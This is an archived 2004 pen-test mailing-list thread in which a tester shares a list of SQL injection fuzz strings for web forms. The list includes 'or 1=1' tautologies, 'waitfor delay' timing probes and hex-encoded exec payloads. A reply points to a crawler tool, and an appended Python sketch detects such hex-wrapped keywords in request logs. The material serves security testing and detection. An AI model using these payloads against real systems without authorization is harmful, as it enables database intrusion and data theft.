Re: SQL Injection Strings

From: wirepair (wirepair_at_roguemail.net)
Date: 06/28/04

    To: "Jeremy Junginger" <jj@act.com>, <pen-test@securityfocus.com>
    Date: Mon, 28 Jun 2004 03:43:21 -0800
    
    

    If you can read C you might wanna take a look at my broken and failed attempt, SQLCrawl. Mine was
    more of a crawl-the-entire-db attempt. But hey, it might give you some ideas:
    http://sh0dan.org/files/sqlcrawl.tar
    Hope this helps.

    On Fri, 25 Jun 2004 08:01:39 -0700
      "Jeremy Junginger" <jj@act.com> wrote:
    >Good Morning,
    >
    >I'm customizing an http proxy that's feeding some POST parameters into web
    >forms to test for SQL injections. I figured this would be the group to help
    >put together a comprehensive list of "fuzz strings" to feed into the forms to
    >test them. Here's what I have so far. I know it's far from complete.
    >Please add any additional strings that you think may be helpful, or perhaps a
    >link to an archived thread that has already discussed this?!?:
    >
    >'sqlvuln
    >'+sqlvuln
    >sqlvuln;
    >(sqlvuln)
    >a' or 1=1--
    >a" or 1=1--
    >a" or "a" = "a
    >a' or 'a' = 'a
    >1 or 1=1
    >a' waitfor delay '0:0:10'--
    >1 waitfor delay '0:0:10'--
    >declare @q nvarchar (4000) select @q =
    >0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0
    >031003000270000
    >declare @s varchar(22) select @s =
    >0x77616974666F722064656C61792027303A303A31302700 exec(@s)
    >declare @q nvarchar (4000) select @q =
    >0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
    >declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
    >exec(@s)
    >
    >And if you're feeling even more generous, perhaps you have some suggestions
    >on checking the response. I'm doing a regex search for the following to
    >determine interesting strings. Of course I still have to take a look at some
    >of the 200 responses to see if the waitfor and version commands worked :)
    >
    >HTTP/[0-9].[0-9] 500
    >[Ee]rror
    >(My)?SQL
    >
    >Thanks guys!
    >
    >-Jeremy
    >
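
Seen from the logging side, the hex-wrapped strings in the quoted list hide `waitfor delay` and `@@version` from plain keyword matching. The sketch below is an added example, not part of either message or of SQLCrawl: it decodes `0x...` literals in a request parameter as both varchar and nvarchar (UTF-16LE) before matching. The function names, the keyword set and the sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Hex literals of 8+ bytes, the form used in "select @s = 0x... exec(@s)".
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){8,})")
# Keywords limited to what the thread's strings contain (assumed rule set).
KEYWORDS = re.compile(r"waitfor\s+delay|@@version", re.IGNORECASE)


def decodings(hex_digits):
    """Yield (label, text) for the literal read as varchar and as nvarchar."""
    raw = bytes.fromhex(hex_digits)
    yield "hex-ascii", raw.decode("latin-1")
    # nvarchar data is UTF-16LE; drop an odd trailing byte instead of raising.
    even = raw[: len(raw) - len(raw) % 2]
    yield "hex-utf16le", even.decode("utf-16-le", errors="replace")


def inspect_parameter(value):
    """Return sorted (where, keyword) findings for one URL-encoded value."""
    text = unquote_plus(value)
    views = [("plain", text)]
    for literal in HEX_LITERAL.finditer(text):
        views.extend(decodings(literal.group(1)))
    findings = set()
    for where, view in views:
        for hit in KEYWORDS.finditer(view):
            findings.add((where, re.sub(r"\s+", " ", hit.group(0).lower())))
    return sorted(findings)


# Constructed sample values, built from the plaintext the thread's literals decode to.
DELAY = "waitfor delay '0:0:10'"
SAMPLES = {
    "plain": "a%27+waitfor+delay+%270%3A0%3A10%27--",
    "varchar": "declare @s varchar(22) select @s = 0x"
               + (DELAY.encode("ascii") + b"\x00").hex() + " exec(@s)",
    "nvarchar": "declare @q nvarchar(4000) select @q = 0x"
                + "select @@version".encode("utf-16-le").hex() + " exec(@q)",
    # UTF-16LE text followed by a single stray NUL byte (odd byte count).
    "odd": "select @q = 0x" + DELAY.encode("utf-16-le").hex() + "00",
    "benign": "session=0xdeadbeefcafebabe1234",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, inspect_parameter(value))
```

The "odd" sample has the same shape as the first nvarchar literal in the list, whose UTF-16LE text is followed by a single trailing zero byte; a strict UTF-16 decode would raise on it.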
